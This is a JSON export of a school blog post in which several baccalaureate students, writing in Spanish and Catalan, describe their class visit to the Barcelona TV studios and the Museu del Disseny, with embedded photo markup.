{"id":485,"date":"2015-10-07T15:30:23","date_gmt":"2015-10-07T13:30:23","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=485"},"modified":"2018-05-06T07:20:09","modified_gmt":"2018-05-06T05:20:09","slug":"visitant-els-estudis-de-barcelona-televisio","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/","title":{"rendered":"Visitant Barcelona TV i el Museu del Disseny"},"content":{"rendered":"<p>Ver\u00f3nica Bezares + Sofia Garc\u00eda ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>El pasado 7 de octubre, los alumnos de primero\u00a0de Batxillerato Art\u00edstico del Instituto Consell de Cent, vini\u00e9ron a visitar nuestras instalaciones de BTV.\u00a0Mi compa\u00f1era Montse les ense\u00f1\u00f3 los diferentes plat\u00f3s, redacci\u00f3n, realizaci\u00f3n\u00a0y otros espacios de la tele. Pero c\u00f3mo tambi\u00e9n tenemos un programa de radio, ahora estoy preparando\u00a0un peque\u00f1o art\u00edculo para contar en el programa, lo que\u00a0hici\u00e9ron estos chicos del art\u00edstico.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-10\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-498 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-10-300x200.jpg\" alt=\"BTV (10)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-10-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-10.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-11\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-499 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-11-300x200.jpg\" alt=\"BTV (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-11.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-12\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-500 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-12-300x200.jpg\" alt=\"BTV (12)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-12-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-12-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-12.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>La visita comenz\u00f3 por el plat\u00f3 m\u00e1s grande, desde donde se hacen programas como \u2018La Porter\u00eda\u2019 o \u2018\u00c0rtic\u2019. All\u00ed vieron\u00a0la\u00a0cantidad\u00a0de\u00a0c\u00e1maras y focos que se necesitan. A continuaci\u00f3n, pasaron a la\u00a0redacci\u00f3n\u00a0donde se estaba produciendo en directo nuestro programa de radio -que por cierto, tambi\u00e9n lo emitimos por internet en directo.<\/p>\n<p>Despu\u00e9s, Montse les ense\u00f1\u00f3 la sala de maquillaje donde se estaban preparando dos reporteras para salir a la calle a grabar. Tambi\u00e9n les explic\u00f3 peque\u00f1os datos como por ejemplo, que las estilistas tienen un presupuesto para poder llevar a cabo su trabajo y que todos los periodistas que salen en c\u00e1mara tienen que pasar por esa sala.\u00a0Por \u00faltimo, mi compa\u00f1era les\u00a0mostr\u00f3\u00a0el plat\u00f3 de\u00a0los informativos incluiendo la funci\u00f3n de algunas herramientas c\u00f3mo el <a href=\"https:\/\/es.wikipedia.org\/wiki\/Teleprompter\" target=\"_blank\">teleprompter<\/a> o el pinganillo por donde le dicen instrucciones los de realizaci\u00f3n\/direcci\u00f3n.\u00a0Y para finalizar la visita,\u00a0les present\u00f3 un video donde se pod\u00edan ver todas las \u2018caretas\u2019 de los diferentes programas que se emiten en BTV.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-17\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-548 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-17-300x200.jpg\" alt=\"BTV (17)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-17-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-17.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-20\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-566 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-20-300x200.jpg\" alt=\"BTV (20)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-20-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-20.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-18\/\" rel=\"attachment wp-att-549\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-549 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-18-300x200.jpg\" alt=\"BTV (18)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-18-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-18.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Al salir, preguntamos a los alumnos qu\u00e9 les hab\u00eda parecido la visita, las respuestas fueron muy variadas, a unos no les hab\u00eda gustado para nada, a otros les hab\u00eda gustado pero esperaban algo m\u00e1s de nosotros y del plat\u00f3 en general y a otros que s\u00ed que les hab\u00eda gustado, pero como siempre, todas las cr\u00edticas tienen que ser bien recibidas.<\/p>\n<p>Redactado por: Carlo Sera\u00a0Falso<\/p><\/blockquote>\n<p><strong>Lydia Le\u00f3n\u00a0____________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>Els del Batxillerat Art\u00edstic a\u00a0Barcelona TV \u00bfper qu\u00e8 no? En relaci\u00f3 l\u00f2gicament a l&#8217;assignatura de Cultura Audiovisual.\u00a0Doncs s\u00ed, l&#8217;alumnat de primer vam anar el passat dimecres 7 d&#8217;octubre a visitar les instal\u00b7lacions de la televisi\u00f3 local de Barcelona.<\/p>\n<p>L&#8217;encarregada de guiar-nos va ser la Montse -que \u00e9s, m\u00e9s o menys com la directora de publicitat de la cadena-, va comen\u00e7ar amb una petita introducci\u00f3 sobre: En qu\u00e8 consisteix Barcelona TV i com funciona.\u00a0Tot seguit vam\u00a0entrar en un dels plat\u00f3s -que en realitat, aix\u00f2 era el que tothom estava esperant-, all\u00e0, vam veure diferents <em>sets<\/em> de programes com La Porteria i \u00c0rtic, a m\u00e9s d\u2019un munt de c\u00e0meres, focus i cables que semblaven caure del sostre&#8230; La Montse ens va explicar\u00a0com funcionaven les coses darrere les c\u00e0meres, i va contestar a algunes de les preguntes que li vam fer, com per exemple, el preu de la c\u00e0mera grua.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-3\/\" rel=\"attachment wp-att-491\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-494\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-6-300x200.jpg\" alt=\"BTV (6)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-6-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-6.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-491\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-3-300x200.jpg\" alt=\"BTV (3)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-3.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-4\/\" rel=\"attachment wp-att-492\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-492\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-4-300x200.jpg\" alt=\"BTV (4)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-4-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-4.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Seguidament, movent-nos a trav\u00e9s de passadissos laber\u00edntics, vam arribar a la redacci\u00f3, on just al costat vam poder veure la retransmissi\u00f3 en directe d&#8217;un programa <a href=\"http:\/\/www.btv.cat\/barcelonafm\/\">de r\u00e0dio<\/a>. En aquell moment, un de nosaltres va pensar que seria curi\u00f3s escoltar el programa des del seu m\u00f2bil, i al moment uns quants vam comen\u00e7ar a demanar-li els auriculars per escoltar-ho tamb\u00e9. Despr\u00e9s vam anar fins la sala de realitzaci\u00f3, perqu\u00e8 la gent es faci una idea&#8230;, \u00e9s una sala amb poca llum, unes quantes pantalles i molts botonets que t\u2019inciten a apretar-los tots. En sortir d&#8217;aquesta sala vam tornar a submergir-nos en un mar de passadissos.<\/p>\n<p>La visita va acabar al plat\u00f3 d\u2019informatius, per\u00f2 no, sense abans passar pel costat de maquillatge, on uns quants vam xafardejar l&#8217;interior, mirant com unes dones es preparaven per sortir en antena. Finalment, la Montse va posar-nos un v\u00eddeo que inclo\u00efa totes les caretes que tenia Barcelona TV, des de l\u2019\u00c0rtic fins a Tube d&#8217;assaig.<\/p><\/blockquote>\n<p><strong>Cristina Callado\u00a0________________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p><em>No es oro todo lo que reluce. <\/em>Tras la visita el pasado mi\u00e9rcoles d\u00eda 7 a las instalaciones de Barcelona televisi\u00f3, pudimos comprobar que es muy diferente lo que vemos en televisi\u00f3n, a c\u00f3mo es en la vida real.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-7\/\" rel=\"attachment wp-att-495\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-495\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-7-300x200.jpg\" alt=\"BTV (7)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-7.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-8\/\" rel=\"attachment wp-att-496\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-496\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-8-300x200.jpg\" alt=\"BTV (8)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-8-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-8.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-13\/\" rel=\"attachment wp-att-501\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-501\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-13-300x200.jpg\" alt=\"BTV (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-13.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-14\/\" rel=\"attachment wp-att-502\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-502\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-14-300x200.jpg\" alt=\"BTV (14)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-14-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-14.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-15\/\" rel=\"attachment wp-att-503\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-503\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-15-300x200.jpg\" alt=\"BTV (15)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-15-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-15.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/btv-16\/\" rel=\"attachment wp-att-504\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-504\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-16-300x200.jpg\" alt=\"BTV (16)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-16-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/BTV-16.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Despu\u00e9s de la visita el alumnado de 1\u00ba de bachillerato art\u00edstico admiti\u00f3 que fue interesante, pero mostr\u00f3 tambi\u00e9n su cr\u00edtica al imaginarse previamente, que esa visita ser\u00eda m\u00e1s interactiva, y es que, con unos poco cambios ser\u00eda m\u00e1s llevadera.\u00a0Tambi\u00e9n confesaron que esperaban unas instalaciones distintas, pues cuando ven los programas por televisi\u00f3n son m\u00e1s espaciosos.\u00a0Aunque lo parezca, no todos sus argumentos fueron negativos.<\/p>\n<p>Al d\u00eda siguiente, ya en la clase, el profesor Francesc pidi\u00f3 al grupo que se anotaran en la pizarra horizontal las posibles mejoras para que traslad\u00e1rselas a la guia Montse.\u00a0Una de las propuestas fue hacer actividades en las cuales los alumnos, lleguen a sentir que son parte del programa, para as\u00ed poder entender el trabajo que se debe realizar, y sus posibilidades.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/dsc01331\/\" rel=\"attachment wp-att-630\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-630\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01331-300x200.jpg\" alt=\"DSC01331\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01331-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01331.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p><strong>Noelia Soler\u00a0________________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p><span style=\"font-weight: 400;\">El dimecres 7 d\u2019octubre l\u2019alumnat de 1r de Batxillerat Art\u00edstic vam visitar la t<strong>elevisi\u00f3 p\u00fablica de Barcelona<\/strong> i el <strong>Museu del Disseny<\/strong>.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A<\/span><a href=\"http:\/\/www.btv.cat\/\"> <span style=\"font-weight: 400;\">Barcelona TV<\/span><\/a><span style=\"font-weight: 400;\">, una noia ens va fer una visita guiada per totes les seves instal\u00b7lacions. Primer va comen\u00e7ar explicant-nos el naixement d\u2019aquest canal i despr\u00e9s quins tipus de programes \u00a0fan. A continuaci\u00f3, vam veure les diferents seccions de gravaci\u00f3 on els presentadors fan el seu programa, permetent-nos veure cada eina televisiva que fan servir, perqu\u00e8 despr\u00e9s, nosaltres ho veiem perfectament en les nostres llars. Aix\u00ed vam arribar al plat\u00f3 gran on graven els programes de l\u2019\u00c0rtic i La Porteria, entre d\u2019altres, all\u00e0 vam tenir el plaer de poder veure els decorats i fer-nos unes fotos amb l\u2019atrezzo. A l\u2019estudi dels informatius, on fan les not\u00edcies, vam veure les eines que fa servir el presentador, la guia ens va explicar per a qu\u00e8 serveix el<\/span><a href=\"https:\/\/en.wikipedia.org\/wiki\/Teleprompter\"> <span style=\"font-weight: 400;\">telepromter<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Una de les novetats de Barcelona TV -inaugurada fa m\u00e9s o menys un any- \u00e9s que la seva secci\u00f3 de r\u00e0dio, tamb\u00e9 es converteix en una televisi\u00f3 que emet via Internet, i aix\u00f2, nosaltres vam presenciar-ho mentre la Montse, la nostra guia, ens explicava qu\u00e8 feina, a m\u00e9s del treball de producci\u00f3. Finalment, vam acabar la visita veient un v\u00eddeo de les caretes de cada programa del canal.<\/span><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-550 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-2-300x200.jpg\" alt=\"M-Disseny (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-2.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-7\/\" rel=\"attachment wp-att-556\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-556 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-7-300x200.jpg\" alt=\"M-Disseny (7)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-7.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-3\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-553 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-3-300x200.jpg\" alt=\"M-Disseny (3)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-3.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Al sortir, ens vam acostar al<a href=\"http:\/\/www.museudeldisseny.cat\/en\"> Museu del Disseny<\/a> per observar l\u2019exposici\u00f3 temporal dels <a href=\"https:\/\/es.wikipedia.org\/wiki\/Premio_FAD\">premis FAD<\/a>. On hi havien per exemple uns monopatins <i>customitzats<\/i>, \u00e9s a dir, adaptats als diferents usos que els dissenyadors els hi han donat. Tamb\u00e9 hi havia diferents tapes de llibres dissenyades, fotografies i fins i tot una part destinada al disseny de moda, per mirar les diferents creacions i posibilitats.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-554\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-4-300x200.jpg\" alt=\"M-Disseny (4)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-4-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-4.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-6\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-555 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-6-300x200.jpg\" alt=\"M-Disseny (6)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-6-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-6.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-8\/\" rel=\"attachment wp-att-557\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-557 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-8-300x200.jpg\" alt=\"M-Disseny (8)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-8-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-8.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-9\/\" rel=\"attachment wp-att-558\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-558 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-9-300x200.jpg\" alt=\"M-Disseny (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-9.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-11\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-560 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-11-300x200.jpg\" alt=\"M-Disseny (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-11.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-10\/\" rel=\"attachment wp-att-559\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-559 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-10-300x200.jpg\" alt=\"M-Disseny (10)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-10-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-10.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/visitant-els-estudis-de-barcelona-televisio\/attachment\/m-disseny-14\/\" rel=\"attachment wp-att-561\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-563 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-14-300x200.jpg\" alt=\"M-Disseny (14)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-14-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/M-Disseny-14.jpg 800w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a 